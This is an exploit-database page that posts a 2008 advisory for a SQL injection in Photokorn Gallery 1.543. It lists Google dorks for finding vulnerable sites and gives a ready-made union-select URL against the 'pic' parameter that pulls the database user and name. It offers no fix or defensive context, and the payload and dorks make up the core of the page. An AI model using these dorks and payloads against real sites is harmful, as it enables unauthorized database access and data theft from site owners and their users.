[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Photokorn Gallery 1.543 (pic) SQL Injection Vulnerability

Author
you_kn0w
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-2603
Category
web applications
Date add
05-02-2008
Platform
unsorted
=========================================================
Photokorn Gallery 1.543 (pic) SQL Injection Vulnerability
=========================================================



#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=#
# ~Author: you_kn0w	                       #
# ~Website: www.youknowz.info                  # 
# ~Script: Photokorn Gallery                   #
# ~Bug: Photokorn Gallery Remote SQL Injection #
#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=#
#               Script Information             #
#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=#    
#                                              # 
# Script name: Photokorn Gallery               #
# Script site: http://www.keil-software.de     #
# Script demo: www.keil-software.de/demos/pk/  #
# Description: PHP/MySQL media gallery         #
# Version: 1.543                               #
#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=# 

# [-]Dorks:
             intext:Powered by photokorn 1.543
           intitle:Powered by photokorn
         
       

# [+]How To Exploit:
 
 http://[target].com/[path]/index.php?action=showpic&cat=8&pic=59&pic=-1/**/union/**/all/**/select/**/1,1,1,concat(user(),0x202D20,database()),null,1,null,0,0,1,0,0,1,0,0,1,null,null,0,0,1,1/*



# [+]Greetz:
 
 Greetz to; ka0x - Celciuz - JosS - Phanter-Root & Screamo

//you_kn0w
#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#





#  0day.today [2024-12-25]  #